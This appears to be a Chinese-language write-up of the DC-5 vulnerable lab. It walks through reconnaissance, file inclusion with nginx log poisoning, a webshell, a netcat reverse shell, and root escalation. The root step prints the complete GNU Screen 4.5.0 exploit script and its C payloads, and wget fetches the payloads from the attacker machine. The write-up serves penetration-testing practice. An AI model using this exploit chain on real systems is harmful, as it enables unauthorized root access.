DC-5

0x00.官网描述

DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

But if you’re really, really stuck, you can watch this video which shows the first step.

0x01.老规矩上nmap

可以发现1为网关，2为宿主机，6为kali，那么4就是我们的受害者

root@JIYE:~/tmp/DC5# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 23:17 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0018s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00077s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.4
Host is up (0.00052s latency).
MAC Address: 00:0C:29:30:2B:A9 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds
root@JIYE:~/tmp/DC5# 

0x02.继续nmap扫描服务及端口

发现开放了80/111/40039端口

root@JIYE:~/tmp/DC5# nmap -A 192.168.1.4 -p- -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 23:20 EDT
Nmap scan report for 192.168.1.4
Host is up (0.00047s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          40039/tcp   status
|   100024  1          44947/tcp6  status
|   100024  1          46754/udp   status
|_  100024  1          51314/udp6  status
40039/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:30:2B:A9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.1.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds
root@JIYE:~/tmp/DC5#

0x03.访问80端口

1.发现前四个都为静态页面，只有contact有提交面板

2.提交数据

发现为url传参

去掉参数再次访问，发现每次刷新copyright有变化

3.使用bp爆破根目录php文件

字典为：

/usr/share/dirb/wordlists/big.txt

爆破完成，发现多出一个footer

访问footer，发现为copyright，且每次刷新都变化，可以判断为存在文件包含

0x04.爆破包含变量

发现file可能为变量

字典为

/usr/share/wordlists/dirb/common.txt

/usr/share/wfuzz/wordlist/vulns/dirTraversal-nix.txt

进行测试，得出file就是变量

0x05.尝试远程文件包含

结果发现不存在远程文件包含

0x06.本地包含

由于不能上传文件，所以包含web日志文件

由于是nginx/1.6.2，可以使用爆破日志文件

这里直接百度找到了日志文件常见的目录，本次实验目录为/var/log/nginx/access.log

bp写入小马

上传成功

0x07.蚁剑连接shell

0x08.蚁剑建立稳定的shell

由于日志文件存在读写，所以在/tmp下创建稳定小马进行连接

此处404用于欺骗

访问

连接

0x08.反弹shell给kali

由于这里有nc，所以可以反弹shell

建立连接

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.4] 38471
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

建立交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'              
www-data@dc-5:~/html$ 
www-data@dc-5:~/html$ 
www-data@dc-5:~/html$ whoami
whoami
www-data
www-data@dc-5:~/html$ 
www-data@dc-5:~/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@dc-5:~/html$ cd /
cd /
www-data@dc-5:/$ 

0x09.提权

1.尝试sudo -l

发现没有

www-data@dc-5:/$ sudo -l
sudo -l
bash: sudo: command not found
www-data@dc-5:/$ 

2.查看SUID

发现screen-4.5.0具有SUID权限

www-data@dc-5:/$ find / -perm /4000 2>dev/null
find / -perm /4000 2>dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
www-data@dc-5:/$ 

3.查看screen-4.5.0是否有漏洞

发现存在本地特权提升漏洞

root@JIYE:~# searchsploit screen 4.5.0
-------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                    |  Path
-------------------------------------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation                                                     | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)                                               | linux/local/41152.txt
-------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@JIYE:~#

上传文件

root@JIYE:~/tmp/DC5/screen_4.5.0# ls
41154.sh
root@JIYE:~/tmp/DC5/screen_4.5.0# cp 41154.sh /var/www/html/
root@JIYE:~/tmp/DC5/screen_4.5.0# systemctl start apache2
root@JIYE:~/tmp/DC5/screen_4.5.0#

www-data@dc-5:/tmp$wget http://192.168.1.6/41154.sh
converted 'http://192.168.1.6/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.1.6/41154.sh' (UTF-8)
--2020-08-25 00:57:32--  http://192.168.1.6/41154.sh
Connecting to 192.168.1.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1192 (1.2K) [text/x-sh]
Saving to: '41154.sh'

41154.sh            100%[=====================>]   1.16K  --.-KB/s   in 0s     

2020-08-25 00:57:32 (350 MB/s) - '41154.sh' saved [1192/1192]

www-data@dc-5:/tmp$ ls
ls
41154.sh  demo.php
www-data@dc-5:/tmp$

4.添加执行权限执行

报错了。。。

www-data@dc-5:/tmp$ chmod +x 41154.sh
chmod +x 41154.sh
www-data@dc-5:/tmp$ ./41154.sh
./41154.sh
bash: ./41154.sh: /bin/bash^M: bad interpreter: No such file or directory
www-data@dc-5:/tmp$ 

查看文件，脚本是一个编译c

root@JIYE:~/tmp/DC5/screen_4.5.0# cat 41154.sh 
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshellroot@JIYE:~/tmp/DC5/screen_4.5.0#

下面进行本地编译

root@JIYE:~/tmp/DC5/screen_4.5.0# cat libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
root@JIYE:~/tmp/DC5/screen_4.5.0#
root@JIYE:~/tmp/DC5/screen_4.5.0# cat rootshell.c 
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
root@JIYE:~/tmp/DC5/screen_4.5.0# 
root@JIYE:~/tmp/DC5/screen_4.5.0# cat run.sh 
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell
root@JIYE:~/tmp/DC5/screen_4.5.0#
root@JIYE:~/tmp/DC5/screen_4.5.0# gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c
./libhax.c: In function ‘dropshell’:
./libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
root@JIYE:~/tmp/DC5/screen_4.5.0# gcc -o ./rootshell ./rootshell.c
./rootshell.c: In function ‘main’:
./rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
./rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
./rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
./rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
./rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
./rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
root@JIYE:~/tmp/DC5/screen_4.5.0#
root@JIYE:~/tmp/DC5/screen_4.5.0# ls
41154.sh  libhax.c  libhax.so  rootshell  rootshell.c
root@JIYE:~/tmp/DC5/screen_4.5.0#

5.执行

www-data@dc-5:/tmp$ wget http://192.168.1.6/run.sh
www-data@dc-5:/tmp$ wget http://192.168.1.6/rootshell
www-data@dc-5:/tmp$ wget http://192.168.1.6/libhax.so
www-data@dc-5:/tmp$ chmod +x run.sh
chmod +x run.sh
www-data@dc-5:/tmp$ ./run.sh
./run.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root
# ls
ls
thisistheflag.txt
# cat thisistheflag.txt
cat /root/thisistheflag.txt


888b    888 d8b                                                      888      888 888 888
8888b   888 Y8P                                                      888      888 888 888
88888b  888                                                          888      888 888 888
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888




Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.